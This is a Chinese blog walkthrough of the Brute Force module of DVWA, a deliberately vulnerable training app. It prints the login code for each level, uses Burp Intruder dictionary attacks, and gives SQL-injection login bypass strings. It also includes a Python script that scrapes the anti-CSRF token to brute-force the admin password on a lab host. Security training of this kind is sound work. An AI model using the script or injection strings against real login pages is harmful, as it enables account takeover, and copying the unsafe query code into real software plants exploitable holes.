DVWA(一)-Brute Force(暴力破解)

最新推荐文章于 2024-05-09 10:15:34 发布
最新推荐文章于 2024-05-09 10:15:34 发布
阅读量489 收藏 1
点赞数 3
分类专栏: DVWA
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_42785117/article/details/96880989
版权
本文介绍暴力破解的概念及其在DVWA平台不同难度级别的实现与防御措施。通过分析源代码,展示了如何利用工具进行暴力破解,并讨论了增加反制机制的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Brute Force(暴力破解)

暴力破解是一种密码分析的方法,即将密码进行逐个推算直到找出真正的密码为止。
需要合适的字典以及攻击工具
工具 : 本篇博客使用的是Burp Intruder
字典 : 在github上有一大把
https://github.com/rootphantomer/Blasting_dictionary

环境 : DVWA搭建在win7 x86上,IP为192.168.157.137,使用物理机win10访问DVWA

LOW级别

在这里插入图片描述

分析low源码

LOW级别源码:
在这里插入图片描述


<?php 

if( isset( $_GET[ 'Login' ] ) ) { 
    // Get username 
    $user = $_GET[ 'username' ]; 

    // Get password 
    $pass = $_GET[ 'password' ]; 
    $pass = md5( $pass ); 

    // Check the database 
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';"; 
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) { 
        // Get users details 
        $row    = mysqli_fetch_assoc( $result ); 
        $avatar = $row["avatar"]; 

        // Login successful 
        echo "<p>Welcome to the password protected area {$user}</p>"; 
        echo "<img src=\"{$avatar}\" />"; 
    } 
    else { 
        // Login failed 
        echo "<pre><br />Username and/or password incorrect.</pre>"; 
    } 

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res); 
} 

?>

分析源码可得,对输入的用户名与md5加密后的密码直接插入到数据库查询语句中,与数据库中已有的数据进行对比,没有限制输入的次数以及验证码机制,也没有对输入进行过滤,所以可以进行暴力破解并且存在sql注入.

进行爆破

1. 使用配置好代理的burpsuite进行拦截。

在这里插入图片描述
在这里插入图片描述

2. 将表单提交给intruder
在这里插入图片描述

3. 设置爆破的位置
在这里插入图片描述效果如下:
在这里插入图片描述
4. 设置需要的字典,进行攻击
在这里插入图片描述
点击 Start attack 进行攻击
在这里插入图片描述
尝试用户名admin和password登陆.
在这里插入图片描述
登陆成功!
LOW级别攻击结束
使用sql注入进行登陆
admin’ or ‘1’ = '1 :

在这里插入图片描述

admin’ #
在这里插入图片描述

Medium

Medium源码

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check the database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( 2 );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

?>

medium级别使用了mysqli_real_escape_string函数来预防sql注入。但是依然没有预防暴力破解,按照low级别的办法即可得到密码。

High

high级别的源码:

<?php

if( isset( $_GET[ 'Login' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input
    $user = $_GET[ 'username' ];
    $user = stripslashes( $user );
    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input
    $pass = $_GET[ 'password' ];
    $pass = stripslashes( $pass );
    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $pass = md5( $pass );

    // Check database
    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {
        // Get users details
        $row    = mysqli_fetch_assoc( $result );
        $avatar = $row["avatar"];

        // Login successful
        echo "<p>Welcome to the password protected area {$user}</p>";
        echo "<img src=\"{$avatar}\" />";
    }
    else {
        // Login failed
        sleep( rand( 0, 3 ) );
        echo "<pre><br />Username and/or password incorrect.</pre>";
    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
}

// Generate Anti-CSRF token
generateSessionToken();

?>

从源码可得得到,High和Medium最大的区别是在于多了checkToken函数,该函数的作用是检查服务端和客户端提交的token是否相同,如果不同,则跳转至index.php。

现在抓取的包需要关注三个参数:

在这里插入图片描述
分别是用户名,密码,客户端提交的token,现在若还想进行暴力破解,必须要得到当前页面的token发送给服务器才可以。

解决思路: 使用python写爆破脚本

from bs4 import BeautifulSoup
import requests,re
#构造数据包
header={'Host': '192.168.157.137',
		'Cache-Control': 'no-cache, must-revalidate',
	    'If-None-Match': "307-52156c6a290c0",
		'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36',
		'Accept': '*/*',
		'Referer': 'http://192.168.157.137/DVWA/vulnerabilities/brute/index.php',
		'Accept-Encoding': 'gzip, deflate, br',
		'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
		'Cookie': 'security=high; PHPSESSID=355dbnek6b5vnjce6181eg9k07'}
requrl = "http://192.168.157.137/DVWA-master/vulnerabilities/brute/index.php"
 
def get_token(URL,header):
	response = requests.get(url=URL,headers=header)
	print (response.status_code,end='  ')
	the_page = response.text
	# print(the_page)
	print (len(the_page))
	#使用正则表达式获得token值
	token = re.findall(r"user_token.*?value='(.*?)'",the_page)
	# print(token[0])
	return token[0]
user_token = get_token(requrl,header)

i=0
for line in open('常用密码.txt'):
	URL = "http://192.168.157.137/DVWA-master/vulnerabilities/brute/index.php"+"?username=admin&password="+line.strip()+"&Login=Login&user_token="+user_token
	# print(URL)
	i = i+1
	print (i,'admin',line.strip(),end = ' ')
	user_token = get_token(URL,header)

嫌慢可以写多线程

注意: 其中的ip地址换成自己的ip地址

结果:
在这里插入图片描述

impossible

添加机制,输错次数超过三次,锁定账号十五分钟,从根本上杜绝了暴力破解。

DVWA——Brute Force
qq_58553228的博客
06-02 496
目的:通过枚举逐个猜测匹配某个预定值Brute Force主要表现形式:通过设置(如表单) 预配值发送给服务器分析响应攻击形式:传统暴力破解、字典暴力破解
dvwa靶场(Brute Force
最新发布
m0_74977101的博客
02-04 395
dvwa靶场(Brute Force
DVWABrute Force
谢公子的博客
08-04 1498
DVWA简介 DVWA(Damn Vulnerable Web Application)是个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是Brute Force(暴力(破解))、Command Injection(命令行注入)、CSRF(跨站请...
DVWA Brute Force
部分学习记录
09-20 174
low 手动试了下admin加password,结果直接出来了,好吧,既然是暴力破解,还是过下,这里利用pydictor生成个密码字典(关于pydictor的使用https://github.com/LandGrey/pydictor/blob/master/docs/doc/usage.md),然后burp抓包,在intruder中对密码进行暴力破解 看了下其他的,好像还可以进行SQL手工注入admin ’ # medium 使用burp抓包暴破,虽然时间上慢了点,但是也能成功 high b
dvwa-brute force
Alter__的博客
05-14 508
菜鸟枚,略显详细。 Brute force
DVWA-Brute Force
知足且坚定,温柔且上进
01-24 333
笔者随手试,admin,password竟然正确了,惊!果然是low等级的啊,不过还是要完整做遍的。 随便输入username与password用burpsuite抓包。 进行爆破: 注意我们要爆破username和password,所以attack type 我们要选择cluser bomb,并且只能在需要爆破的地方加上Add哦 Payload set 1和2 在Option中选择相关...
DVWA靶场-Brute Force暴力破解
mlws1900的博客
03-12 1959
具体来说,它使用了mysqli_real_escape_string()函数对用户输入的用户名进行转义,确保特殊字符在SQL语句中不会被误解为SQL语句的部分,从而保护数据库安全。进入暴力破解的界面,有点基础的都知道,在bp中通过字典,导入用户名和密码进行爆破,这样的操作大家见多了,再写没啥意思,想看的可以去pikachu靶场的暴力破解去了解具体操作,本文主要结合代码进行分析。3.high-高等安全等级,有安全措施保护,是中等安全等级的加深,这个等级下的安全漏洞可能不允许相同程度的攻击。
DVWA靶场-Brute Force暴力破解~保姆级教程!!!
2301_77360738的博客
05-09 6348
DVWA靶场初体验,超简单的暴力破解!!!
dvwa学习-brute force暴力破解
qq_17762247的博客
05-09 2026
、简介: Brute-Force(暴力破解),又称为穷举攻击,是种密码分析的方法,即将密码进行逐个推算直到找出真正的密码为止。例如:个已知是四位数并且全部由阿拉伯数字组成的密码,其可能共有10000种组合,因此最多尝试9999次就能找到正确的密码。理论上除了具有完善保密性的密码以外,利用这种方法可以破解任何种密码,问题只在于如何缩短试误时间。有些人运用计算机来增加效率,有些人透过字典攻击来...
DVWA-Brute Force通关教程-完结
刘箫-技术库
03-22 915
Medium步骤和Low等级完全样,Medum等级中分别对用户名和密码进行了查询,提高了安全性,主要区别是在登录失败后会执行sleep(2)函数,即程序休眠两秒,这两秒内不能再登录,这延长了爆破的时间,但并不影响结果。Low等级只是把输入的用户名和密码放到数据库去查询并返回结果,并没有做任何的限制,只要字典够强大,很容易就跑出来。2、开启代理,打开Burpsuite工具,点击login并拦截包。1、在登录框输入用户名和密码,随便输入即可。(2)选择输入的用户名和密码,点击。6、字典运行完毕后,点击。
DVWA通关--Brute Force暴力破解
箭雨镜屋
07-20 2004
按照我的理解,暴力破解的成功概率,方面取决于被攻击系统是否有防暴力破解机制,防暴力破解机制是否高效,另方面取决于攻击者的字典以及计算机性能。 本文主要目的是分析防暴力破解机制是否有效,以及如何绕过某些防暴力破解机制,因此,出于节省时间的目的,会使用包含正确答案的比较小的用户名密码字典,仅作示范。 LOW 通关思路 1、首先观察页面,发现只要输入的用户名或者密码有个错误,就回显“Username and/or password incorrect.”,并且尝试了6次用admin用户登录,6次都输
DVWA: Brute Force
qq_43299137的博客
04-30 261
Low security: 首先随便输入个用户名和密码: 在username中输入:admin' or '1'='1 点击登陆后: 显示登陆成功了。 简单分析下其中原理:这种方法就是sql注入,利用mysql的查询语句,达到不用密码就可以直接登陆的目的。 看下其中源码 SELECT * FROM `users` WHERE user = '$user' AND password = '$pass' 当我们输入:admin' or '1'='1时就相当于把代码改成: .
dvwaBrute Force
Alsn86的博客
01-13 381
low等级 <?php if( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE user = '$user' AND passw
DVWABrute Force
weixin_51167520的博客
03-06 715
DVWABrute Force 实验环境:Win7 win2k8 Brute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令 ** Low 级 ** 首先在WIN7上把安全级别改成LOW 打开WIN7访问http:192.168.60.22:81暴力破解: 漏洞利用 方法、爆破利用 burpsuite 即可完成 输入错误的用户名和密码: 抓取流量后,发送到 Intruder 模块来进行爆破,在 Position 中的 Attack type 选择 cl
dvwa通关brute force
06-08
DVWA中,Brute Force挑战是关于用户登录部分的个环节,主要是测试用户的密码暴力破解能力。 当你遇到Brute Force关卡时,目标是尝试使用各种可能的用户名和密码组合,直到找到正确的登录凭证。这通常涉及到编写...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值